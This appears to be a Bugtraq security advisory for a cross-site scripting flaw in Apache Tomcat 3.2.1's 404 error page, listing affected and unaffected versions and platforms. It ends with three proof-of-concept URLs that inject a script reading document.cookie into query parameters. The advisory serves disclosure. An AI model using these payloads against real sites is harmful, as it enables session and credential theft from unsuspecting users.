Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting

Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Tomcat 3.2.1 is affected; other versions may also be vulnerable. 

Bugtraq ID:  	 37149
Class: 	Input Validation Error
CVE: 	
Remote: 	Yes
Local: 	No
Published: 	Sep 02 2009 12:00AM
Updated: 	Nov 30 2009 10:25PM
Credit: 	MustLive
Vulnerable: 	Apache Software Foundation Tomcat 3.2.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP Secure OS software for Linux 1.0
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.2
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.1.1
Apache Software Foundation Tomcat 3.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.0
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8
- Sun Solaris 7.0
Not Vulnerable: 	Apache Software Foundation Tomcat 6.0
Apache Software Foundation Tomcat 5.5
Apache Software Foundation Tomcat 4.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.5
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 3.3
- Sun Solaris 8
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.2.3
Apache Software Foundation Tomcat 3.2.2 beta2
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8
- Sun Solaris 7.0

http://server/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://server/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://server/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1